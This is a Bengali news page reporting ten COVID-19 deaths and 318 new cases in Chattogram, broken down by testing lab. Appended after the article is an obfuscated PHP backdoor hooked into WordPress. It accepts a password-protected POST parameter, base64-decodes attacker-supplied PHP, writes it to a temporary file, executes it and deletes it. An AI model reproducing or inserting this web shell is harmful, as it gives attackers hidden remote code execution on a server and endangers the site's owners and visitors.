রবিবার, ২৩শে জুন, ২০২৪ খ্রিস্টাব্দ ৯ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

চট্টগ্রামে আরও ১০ জনের মৃত্যু, শনাক্ত ৩১৮

news-image

নিজস্ব প্রতিবেদক : করোনাভাইরাসে আক্রান্ত হয়ে চট্টগ্রামে গত ২৪ ঘণ্টায় আরও ১০ জনের মৃত্যু হয়েছে। এ নিয়ে জেলায় মোট মৃতের সংখ্যা দাঁড়াল এক হাজার ১৯৩ জনে। একই সময়ের মধ্যে করোনা শনাক্ত হন ৩১৮ জন। এর মধ্য দিয়ে জেলায় মোট শনাক্তের সংখ্যা দাঁড়াল ৯৭ হাজার ৬৭০ জনে।

মঙ্গলবার (২৪ আগস্ট) সকালে চট্টগ্রাম সিভিল সার্জন কার্যালয় থেকে প্রকাশিত প্রতিবেদন থেকে এ তথ্য জানা গেছে।

সিভিল সার্জন ডা. শেখ ফজলে রাব্বি জানান, গত ২৪ ঘণ্টায় চট্টগ্রামের বিভিন্ন ল্যাবে দুই হাজার ১৪৫ জনের নমুনা পরীক্ষায় ৩১৮ জনের দেহে করোনার জীবাণু শনাক্ত হয়। এদের মধ্যে নগরের ২০২ উপজেলার ১১৬ জন।

তিনি আরও জানান, গত ২৪ ঘণ্টায় চট্টগ্রাম বিশ্ববিদ্যালয় ল্যাবে ৫৬ জন, ফৌজদারহাট বিআইটিআইডি ল্যাবে ৭১ জন, চট্টগ্রাম মেডিকেল কলেজ ল্যাবে ৪০ জন, চট্টগ্রাম ভেটেরিনারি ইউনিভার্সিটি ল্যাবে ৫৭ জন, ইমপেরিয়াল হাসপাতাল ল্যাবে ১৫ জন ও শেভরণ হাসপাতাল ল্যাবে ২২ জনের শরীরে করোনার সংক্রমণ শনাক্ত হয়।

একই সময়ে চট্টগ্রাম মা ও শিশু হাসপাতাল ল্যাবে নয়জন, জেনারেল হাসপাতাল আরটিআরএল হাসপাতাল ল্যাবে দুইজন, মেডিকেল সেন্টার হাসপাতাল ল্যাবে দুইজন, ইপিক হেলথ কেয়ার ল্যাবে ২৭ জন এবং অ্যান্টিজেন টেস্টে ১৭ জনের শরীরে করোনার সংক্রমণ শনাক্ত হয়।

 

এ জাতীয় আরও খবর

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}